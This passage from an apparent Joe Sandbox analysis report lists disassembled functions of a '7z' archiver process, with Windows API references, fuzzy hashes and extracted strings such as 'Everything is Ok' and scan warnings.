                                                                                                                                                                                                        • DeviceIoControl.KERNEL32 ref: 00B590F6
                                                                                                                                                                                                          • Part of subcall function 00B5ABB0: GetModuleHandleW.KERNEL32 ref: 00B5ABD1
                                                                                                                                                                                                          • Part of subcall function 00B5ABB0: GetProcAddress.KERNEL32 ref: 00B5ABE1
                                                                                                                                                                                                          • Part of subcall function 00B5ABB0: GetDiskFreeSpaceW.KERNEL32 ref: 00B5AC32
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ControlDevice$AddressDiskFreeHandleModuleProcSpace
                                                                                                                                                                                                        • String ID: ($:
                                                                                                                                                                                                        • API String ID: 4250411929-4277925470
                                                                                                                                                                                                        • Opcode ID: 5b9f9703c519a548ceef949604e44196ebe8030fab0dc2f4f3b95e46287e534a
                                                                                                                                                                                                        • Instruction ID: 49add898ffde4eb234ec9a84c28380d770b898c6f6a3874000b9e87812fc0118
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5b9f9703c519a548ceef949604e44196ebe8030fab0dc2f4f3b95e46287e534a
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1051AD33608BC1D6CB21DF20F45079EB7A5F384764F5885A6DB8A47B58EB79C4A8CB40
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free$DriveLogicalStrings
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 837055893-0
                                                                                                                                                                                                        • Opcode ID: 3de173a54933036e0db587b8e1d0ec2bc758cc62df0222796deffbdb40624916
                                                                                                                                                                                                        • Instruction ID: aa96f3326f709ab4c8cc72292d1835172224c1b001fb48c9b6b976d390b08e35
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3de173a54933036e0db587b8e1d0ec2bc758cc62df0222796deffbdb40624916
                                                                                                                                                                                                        • Instruction Fuzzy Hash: F131B523302A4145DA31EF22E85136B62D1EB85BEAF4852F49E5E67384DF38C94EC700
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • free.MSVCRT ref: 00B596D1
                                                                                                                                                                                                        • GetFileInformationByHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,FFFFFFFF,00000001,00000000), ref: 00B59723
                                                                                                                                                                                                        • DeviceIoControl.KERNEL32 ref: 00B5976C
                                                                                                                                                                                                        • free.MSVCRT ref: 00B59779
                                                                                                                                                                                                        • free.MSVCRT ref: 00B59796
                                                                                                                                                                                                        • memmove.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,FFFFFFFF,00000001,00000000), ref: 00B597C4
                                                                                                                                                                                                        • free.MSVCRT ref: 00B597CD
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free$ControlDeviceFileHandleInformationmemmove
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2572579059-0
                                                                                                                                                                                                        • Opcode ID: 81d8e5875d3dc795eb3d600148a840ab749245db3ba8f1a9a9afcbd51cdf2eb3
                                                                                                                                                                                                        • Instruction ID: 1d267fda30397ae680708173e8d10dcc1ebd0e4a226412b8b48ac33d931415a7
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 81d8e5875d3dc795eb3d600148a840ab749245db3ba8f1a9a9afcbd51cdf2eb3
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3E31A632216E40C5DA309F11F95036AB3A4E386BE1F5842A1EFE947B95DF39C8998700
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Version$AddressHandleModuleProc
                                                                                                                                                                                                        • String ID: SetDefaultDllDirectories$kernel32.dll
                                                                                                                                                                                                        • API String ID: 2268189529-2102062458
                                                                                                                                                                                                        • Opcode ID: 7a4e38354ab5005c4356f78164d2e6d32f5e0198e07bcfd6bf58e12f2388e286
                                                                                                                                                                                                        • Instruction ID: b370060b070cda814f0ce2d5c38b4f79ea9e1c3fe9d5e3a065b8db529418c58b
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7a4e38354ab5005c4356f78164d2e6d32f5e0198e07bcfd6bf58e12f2388e286
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7FF0F875209602C2EF349B51F8543A933B0FB89719F850275D24E812B4EF3CC64DCB10
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: AddressDiskFreeHandleModuleProcSpace
                                                                                                                                                                                                        • String ID: GetDiskFreeSpaceExW$kernel32.dll
                                                                                                                                                                                                        • API String ID: 1197914913-1127948838
                                                                                                                                                                                                        • Opcode ID: 91232d8e4c27da98ed619dc657d8975082bad2379c6f63f0bea740be7d830b66
                                                                                                                                                                                                        • Instruction ID: ac50366be844c671954a3b0875cea191b86ee92c569c8d7adcaad4da80b36f7f
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 91232d8e4c27da98ed619dc657d8975082bad2379c6f63f0bea740be7d830b66
                                                                                                                                                                                                        • Instruction Fuzzy Hash: ED11673231AB4696DB10CF55F880BAAB364F794B90F449022EF8E43728EF38C559CB00
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • FileTimeToLocalFileTime.KERNEL32 ref: 00B5B12A
                                                                                                                                                                                                        • FileTimeToSystemTime.KERNEL32 ref: 00B5B13E
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Time$File$LocalSystem
                                                                                                                                                                                                        • String ID: gfff
                                                                                                                                                                                                        • API String ID: 1748579591-1553575800
                                                                                                                                                                                                        • Opcode ID: e09e1fa2f5dca829b3cb60a828e392fca3363189765d43a1e7a71e091b5d5d10
                                                                                                                                                                                                        • Instruction ID: f80d9b9e89e209ed2a1f4fab763c7a817e0805d3b5e1a80113e37621772724bc
                                                                                                                                                                                                        • Opcode Fuzzy Hash: e09e1fa2f5dca829b3cb60a828e392fca3363189765d43a1e7a71e091b5d5d10
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 89519793B042C08BE7198B3DD846BDDBFC1E3A5758F08826ADB95C7785E26DC50AC721
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 00B5B5B8: GetCurrentProcess.KERNEL32 ref: 00B5B5C2
                                                                                                                                                                                                        • GetSystemInfo.KERNEL32 ref: 00B5B624
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CurrentInfoProcessSystem
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1098911721-0
                                                                                                                                                                                                        • Opcode ID: 3fe78990de1b082a0b60084bcba32a5828cb8e3291c47789f548cb5e73abf302
                                                                                                                                                                                                        • Instruction ID: 8fd4594baf2362a5afe4c8736c6f1ed58fc455702d743cf1fa5a0a7f8af0d893
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3fe78990de1b082a0b60084bcba32a5828cb8e3291c47789f548cb5e73abf302
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 38E0ED6662449583CA70DB08E552B69F3A0F7A4746FC05691EA8A82E14DF2DC6588F00
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 34068706c2d5e8e26acb18a5d787bd8c28d1e0f249bc181dd9bcec1cf4fba99d
                                                                                                                                                                                                        • Instruction ID: 28c2724fb23dbda97642d8b7dd185ece33fef4764bb070aebcff4110c2f5ae3c
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 34068706c2d5e8e26acb18a5d787bd8c28d1e0f249bc181dd9bcec1cf4fba99d
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2CE042F290A2058FD3D98F6AD4412587EE4F748795B60C13FA608D3301D37581888F92
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                                                                                        • Opcode ID: 9cbdc30e6d0b5ea00b42a6c34bff6f946b52da21b37e4cfe8bd3163259cd7e86
                                                                                                                                                                                                        • Instruction ID: cbe7dd28b9158d3dec14a234cd676982ab3ff8d224440e2629629f59a780b3fd
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9cbdc30e6d0b5ea00b42a6c34bff6f946b52da21b37e4cfe8bd3163259cd7e86
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 49D19F2335798081DA50FF25E49175FA7A0E7C3785F5051D2AF9EA7B29DE28C84ACF04
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                                                                                        • Opcode ID: 28ab6cdc9f263cf9404c085a8059b8072311b560ecc5f73d0aa5210d99d2189d
                                                                                                                                                                                                        • Instruction ID: 655b14365e1a65834ace5a589c738b6c5e38007e8b3e1f80eca707850df4cff1
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 28ab6cdc9f263cf9404c085a8059b8072311b560ecc5f73d0aa5210d99d2189d
                                                                                                                                                                                                        • Instruction Fuzzy Hash: A491F733307A8486CA24EF36D4A5A6E67A0F787F86B0554E1DF5E63721CE28C449CB05
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free$ExceptionThrowmallocmemmove
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3352498445-0
                                                                                                                                                                                                        • Opcode ID: 060a242fe419d18ace11e0b1f05433c8320572bf80c973ccad8851887f661016
                                                                                                                                                                                                        • Instruction ID: 34ffd63b228687c8873331413a03c3cac10551b6d56dda1dcbd0af91c3061f28
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 060a242fe419d18ace11e0b1f05433c8320572bf80c973ccad8851887f661016
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 39E1A933705AD086CA30FF15E48129EA7E0F786BD1F4581A6EFAD67B15DE68C846CB40
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free$memmove$ExceptionThrow
                                                                                                                                                                                                        • String ID: incorrect update switch command$pqrxyzw
                                                                                                                                                                                                        • API String ID: 3957182552-3922825594
                                                                                                                                                                                                        • Opcode ID: 7c7c3e7fd9314440e1a1777af8ec9796aa83228940c07231adba96d4221eb7b0
                                                                                                                                                                                                        • Instruction ID: 1be5084dbb1a8cb03e8c791c5b4be69722a4cd6f82922586a0db51b1340f3fb2
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7c7c3e7fd9314440e1a1777af8ec9796aa83228940c07231adba96d4221eb7b0
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4881722322698492CB20EF16D89176F73A0F7C5B85F4051E2EF9E57765DE38C94ACB40
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free$memmove$wcscmp$ExceptionThrow
                                                                                                                                                                                                        • String ID: Empty file path
                                                                                                                                                                                                        • API String ID: 462375450-1562447899
                                                                                                                                                                                                        • Opcode ID: ab664bf3e0e52273a7b2c93043638589f708cf9af184803b1dcc7a9fe34b6b52
                                                                                                                                                                                                        • Instruction ID: bef95ea0e8edf6a24411242939216657c27bfe56dbcb3ede60f6f15a2f4e51d2
                                                                                                                                                                                                        • Opcode Fuzzy Hash: ab664bf3e0e52273a7b2c93043638589f708cf9af184803b1dcc7a9fe34b6b52
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2AD1E433215A8086CB20EF25E4913AEB7A0F785B96F4441E5EF9A57B59DF38C949CB00
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: \$\\?\$\\?\UNC\
                                                                                                                                                                                                        • API String ID: 0-1962706685
                                                                                                                                                                                                        • Opcode ID: afa8621be2f1ba154e1a16fbf024995038344baa93033ba3e81e106e98a5c824
                                                                                                                                                                                                        • Instruction ID: 9e6a71122c45e32a1240d07d8ecadf072df0732f760c3aac57f405c01d0de0a7
                                                                                                                                                                                                        • Opcode Fuzzy Hash: afa8621be2f1ba154e1a16fbf024995038344baa93033ba3e81e106e98a5c824
                                                                                                                                                                                                        • Instruction Fuzzy Hash: FEB1942230994090CE10FF21E4A176EA7E0EB92BD6F4452D1FE4A67775DF69C94ECB02
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00B51C98
                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00B51CB9
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ErrorLast
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1452528299-0
                                                                                                                                                                                                        • Opcode ID: 9404618c4272822a705cb722a6b2e01a42813b165ea22c09ed02a541621bc0be
                                                                                                                                                                                                        • Instruction ID: 19e8e3d48f5a26abccc6b7a62f5ba3d21d470db7dab5278ac96db47e9f2bf2c5
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9404618c4272822a705cb722a6b2e01a42813b165ea22c09ed02a541621bc0be
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8EA1932264A64081CB20EF19E49176EB7A1E7D67D2F4415D2FF8E53769DF28C88ECB00
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                                                                                        • Opcode ID: a5da411e75573f0648736714f517a5bbb6ba3fc978bf78ef7329a5e2f6ab8de4
                                                                                                                                                                                                        • Instruction ID: 667dcfeb1e6095173dd2ce3354af47ca269468299d0e2af8a280b77e941f1df7
                                                                                                                                                                                                        • Opcode Fuzzy Hash: a5da411e75573f0648736714f517a5bbb6ba3fc978bf78ef7329a5e2f6ab8de4
                                                                                                                                                                                                        • Instruction Fuzzy Hash: F6514F27712E8089CB21EF31D85136A63A1F797F99F5941F2DE2D2B759DF20C8068750
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: fputs$free$fputc
                                                                                                                                                                                                        • String ID: Error:$ file$Everything is Ok$Scan WARNINGS for files and folders:$Scan WARNINGS: $WARNING: Cannot open $WARNINGS for files:
